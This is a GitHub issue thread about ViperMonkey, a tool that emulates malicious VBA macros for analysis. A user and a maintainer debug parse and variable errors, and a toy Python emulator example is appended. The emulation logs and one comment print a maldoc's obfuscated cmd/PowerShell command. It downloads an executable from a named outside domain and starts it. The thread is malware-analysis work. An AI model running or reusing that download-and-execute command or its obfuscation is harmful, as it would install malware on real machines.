decalage2 / ViperMonkey

A VBA parser and emulation engine to analyze malicious macros.

Error:Expected end of text exception. #29

Open tkfm-github opened 6 years ago

tkfm-github commented 6 years ago

Hi, I love your tool, but I got an "Expected end of text" exception.

The log is here.

```
PARSING VBA CODE:
INFO parsed Function sarneoolop (): 4 statement(s)
INFO parsed Function zygotosfoot (): 1 statement(s)
INFO parsed Function underfelles (): 1 statement(s)
INFO parsed Sub Workbook_Open (): 1 statement(s)
INFO parsed Function beerlonger (): 2 statement(s)
INFO parsed Function tentengole (): 7 statement(s)
INFO parsed Function herjioolokd (): 1 statement(s)
INFO parsed Function manmandeep (): 3 statement(s)
INFO parsed Function vellageteek (): 1 statement(s)
Module None
Sub Workbook_Open (): 1 statement(s)
Function beerlonger (): 2 statement(s)
Function zygotosfoot (): 1 statement(s)
Function tentengole (): 7 statement(s)
Function herjioolokd (): 1 statement(s)
Function vellageteek (): 1 statement(s)
Function manmandeep (): 3 statement(s)
Function underfelles (): 1 statement(s)
Function sarneoolop (): 4 statement(s)

Function catdogcat()
^
Expected end of text (at char 1879), (line:48, col:1)

TRACING VBA CODE (entrypoint = Auto*):
Recorded Actions:
+--------+------------+-------------+
| Action | Parameters | Description |
+--------+------------+-------------+
+--------+------------+-------------+
```

And the macro is here.

test.txt

The environment is here.

```
vipermonkey==0.5
pyparsing==2.2.0
oletools==0.52.1
```

Can you help me?

kirk-sayre-work commented 6 years ago

Could you please post the hash of the original document?

tkfm-github commented 6 years ago

Thanks for the reply.

This is the SHA256 hash: f995c469b821bf1c60f0b00afced3e0c0aa19badb9dae2033b9f5c04dcf3ba5c

You can download it from here if you have an account: https://www.hybrid-analysis.com/sample/f995c469b821bf1c60f0b00afced3e0c0aa19badb9dae2033b9f5c04dcf3ba5c?environmentId=100

kirk-sayre-work commented 6 years ago

Thanks for posting the hash. The fixes have been made in my ViperMonkey development fork https://github.com/kirk-sayre-work/ViperMonkey to analyze this document. I added some stubbed CheckSpelling() support to handle the interesting use of CheckSpelling() in the doc.

This doc winds up running (after PowerShell deobfuscation) (new-object system.net.webclient).downloadfile('http[:]//ramelograna[.]com/splugin.exe','ppguvq.exe');start-process 'ppguvq.exe'

tkfm-github commented 6 years ago

Thanks a lot! I tried your fix, but still got some errors. The log and result are below.

```
TRACING VBA CODE (entrypoint = Auto*):
INFO ACTION: Found Entry Point - params 'workbook_open' -
ERROR Variable 'siglnimgSignedValid' not found
INFO calling Function: Left('external hard', 2)
INFO calling Function: Right('free ', 2)
INFO calling Function: Right('setter', 4)
INFO calling Function: Left('tter', 2)
INFO calling Function: Rnd()
INFO calling Function: Int(6.241525775553681)
INFO calling Function: Rnd()
INFO calling Function: Int(112.7541883329977)
INFO calling Function: Rnd()
INFO calling Function: Int(117.71663287889672)
INFO calling Function: Rnd()
INFO calling Function: Int(99.853607251328)
INFO calling Function: Rnd()
INFO calling Function: Int(104.84977434994758)
INFO calling Function: Rnd()
INFO calling Function: Int(119.02764032037439)
INFO calling Function: Rnd()
INFO calling Function: Int(122.06981814741806)
INFO calling Function: CheckSpelling('puchwz')
INFO calling Function: Left('"english" news', 1)
ERROR Variable 'RibbonControlSizeRegular' not found
INFO Calling Procedure: Shell('[\'cMD.exe /c "po^w^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FI...')
INFO Shell('cMD.exe /c "po^w^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=\'\'\',\'\'\';$hit=\'dfil\';$fd=\');sta\';$dr=\'(ne\';$ed=\'ject \';$ipo=\'syst\';$kos=\'t.we\';$rem=\'ent).do\';$sad=\'wnloa\';$kp=\'w-ob\';$nim=\'e(\'\'\';$mo=\'\';$uy=\'puchwz\';$ji=\'.ex\';$pol=\'em.ne\';$oe=\'e\'\'\';$jik=\'rt-pro\';$naw=\'cess \'\'\';$lim=\'bcli\';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+\'http://ramelograna.com/splugin.exe\'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"')
INFO ACTION: Execute Command - params 'cMD.exe /c "po^w^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=\'\'\',\'\'\';$hit=\'dfil\';$fd=\');sta\';$dr=\'(ne\';$ed=\'ject \';$ipo=\'syst\';$kos=\'t.we\';$rem=\'ent).do\';$sad=\'wnloa\';$kp=\'w-ob\';$nim=\'e(\'\'\';$mo=\'\';$uy=\'puchwz\';$ji=\'.ex\';$pol=\'em.ne\';$oe=\'e\'\'\';$jik=\'rt-pro\';$naw=\'cess \'\'\';$lim=\'bcli\';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+\'http://ramelograna.com/splugin.exe\'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"' - Shell function
Recorded Actions:
+-------------------+---------------------------+----------------+
| Action            | Parameters                | Description    |
+-------------------+---------------------------+----------------+
| Found Entry Point | workbook_open             |                |
| Execute Command   | cMD.exe /c                | Shell function |
|                   | "po^w^ERS^hel^l^.e^x^e^   |                |
|                   | -nO^l -No^Ni^Nt^          |                |
|                   | -W^InDO^ws^ 1             |                |
|                   | -NoprO^FIle^ -eX^Ec^U     |                |
|                   | B^Ypa^S^s $fos=''',''';$h |                |
|                   | it='dfil';$fd=');sta';$dr |                |
|                   | ='(ne';$ed='ject ';$ipo=' |                |
|                   | syst';$kos='t.we';$rem='e |                |
|                   | nt).do';$sad='wnloa';$kp= |                |
|                   | 'w-ob';$nim='e(''';$mo='' |                |
|                   | ;$uy='puchwz';$ji='.ex';$ |                |
|                   | pol='em.ne';$oe='e''';$ji |                |
|                   | k='rt-pro';$naw='cess     |                |
|                   | ''';$lim='bcli';Invoke-Ex |                |
|                   | pression($dr+$kp+$ed+$ipo |                |
|                   | +$pol+$kos+$lim+$rem+$sad |                |
|                   | +$hit+$nim+'http://ramelo |                |
|                   | grana.com/splugin.exe'+$f |                |
|                   | os+$mo+$uy+$ji+$oe+$fd+$j |                |
|                   | ik+$naw+$mo+$uy+$ji+$oe)" |                |
+-------------------+---------------------------+----------------+
```

Any ideas? Or is something wrong with my environment?

```
Python 2.7.12 (ubuntu16.04.4)
ViperMonkey: commit: eb5f2f9599b135628ecc4efc6c95f3b9ccf46eee
pyparsing==2.2.0
oletools==0.52.1
```

kirk-sayre-work commented 6 years ago

The errors you are seeing are from variable reads of builtin VBA variables that ViperMonkey currently does not support. I've been adding in support for these variables on an as-needed basis when I find maldocs that fail to analyze due to the missing variables. In many cases ViperMonkey prints errors about missing variables but still successfully computes the final malicious commands executed by the VBA. For maldoc f995c469b821bf1c60f0b00afced3e0c0aa19badb9dae2033b9f5c04dcf3ba5c ViperMonkey gets the final command run, so I'm going to put adding those missing variables low (for now) on the priority stack.

If you find some maldocs for which ViperMonkey fails to compute the final commands executed due to missing variables, please let me know.
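As an added illustration of the behaviour described in the maintainer's reply (this is toy code written for this page, not ViperMonkey's own implementation), a minimal emulator that logs an ERROR when a macro reads an unsupported builtin variable, treats the unresolved read as an empty string (an assumption; the real default is not stated in the thread), and still records the final Shell command from a constructed, harmless macro fragment:

```python
import logging
import re

logging.basicConfig(level=logging.INFO, format="%(levelname)s %(message)s")
log = logging.getLogger("toy-emulator")

class Context:
    """Hypothetical stand-in for the emulator's variable context."""
    def __init__(self, variables):
        self.variables = dict(variables)
        self.errors = []    # names of variables that could not be resolved
        self.actions = []   # (action, params) pairs, like "Recorded Actions"

    def get(self, name):
        if name in self.variables:
            return self.variables[name]
        # Unsupported builtin variable: log the error but keep emulating.
        # Assumption: an unresolved read evaluates to "" so the string
        # concatenation can still complete (not ViperMonkey's own rule).
        log.error("Variable '%s' not found", name)
        self.errors.append(name)
        return ""

# One piece of an & expression: either a "string literal" or a bare name.
TOKEN = re.compile(r'"([^"]*)"|([A-Za-z_]\w*)')

def eval_concat(expr, ctx):
    """Evaluate a & "lit" & b style expressions; literals may not contain &."""
    parts = []
    for piece in expr.split("&"):
        m = TOKEN.fullmatch(piece.strip())
        if m is None:
            raise ValueError("unsupported piece: %r" % piece)
        literal, name = m.groups()
        parts.append(literal if literal is not None else ctx.get(name))
    return "".join(parts)

def emulate_shell(arg_expr, ctx):
    """Emulate Shell(<expr>): resolve the argument and record the action."""
    cmd = eval_concat(arg_expr, ctx)
    ctx.actions.append(("Execute Command", cmd))
    log.info("ACTION: Execute Command - params %r - Shell function", cmd)
    return cmd

def run_sample():
    # Constructed macro fragment: a harmless command split across variables,
    # with a read of an undefined builtin mixed in, as in the report above.
    ctx = Context({"p1": "cmd.exe /c ", "p3": " hello"})
    cmd = emulate_shell('p1 & "echo" & RibbonControlSizeRegular & p3', ctx)
    return cmd, ctx.errors, ctx.actions
```

Running `run_sample()` prints the ERROR for `RibbonControlSizeRegular` and still returns the assembled command, which is the "errors but final command recovered" outcome the reply describes.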